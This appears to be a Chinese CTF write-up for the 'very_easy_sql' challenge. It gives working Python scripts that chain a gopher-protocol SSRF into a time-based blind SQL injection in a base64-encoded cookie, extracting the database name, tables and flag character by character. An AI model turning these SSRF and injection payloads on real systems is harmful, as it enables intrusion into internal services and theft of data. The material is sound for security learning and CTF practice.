当前位置：首页 > article >正文

攻防世界32 very_easy_sql

article 2025/2/10 9:47:08

不太会，以后慢慢看

被骗了，看见very_easy就点进来了，结果所有sql能试的全试了一点用都没有

打开源代码发现有个use.php

好家伙，这是真的在考sql吗......

制作gopher协议的脚本：

import urllib.parse

host = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)

test =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(host,content_length,content)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

得出来payload在网址处提交：

gopher://127.0.0.1:80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252024%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A

Set_Cookie处有YWRtaW4%3D，解码半天弄不出来，突然意识到%3D是=的意思，哎呦我这个笨蛋

没有报错没有回显，这道题用时间盲注，注入点在cookie中（？）

时间盲注脚本：

import urllib.parse
import requests
import time
import base64

url = "http://61.147.171.105:51906/use.php?url="
flag = ""
for pos in range(1, 50):
    for i in range(32, 127):
        # 猜一下回显数量
        #payload="') union select 1,2,if(1=1,sleep(2),1)#"
        # 猜数据库名字为security
        payload = "') union select 1,2,if(ascii(substr((database()),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"
        # 猜解数据库表名为flag
        # poc = "') union select 1,2,if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"
        # 猜解flag字段
        #payload = "') union select 1,2,if(ascii(substr((select * from flag),"+str(pos)+",1))="+str(i)+",sleep(2),1) #"
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        final_poc = "gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D"+payload+"%3B%250d%250a"
        start = time.time()
        requests.get(url+final_poc)
        end = time.time()
        if end-start > 2:         # 如果时间大于2秒，说明这个字符是正确的
            flag += chr(i)
            print(flag)
            break
        else:
            continue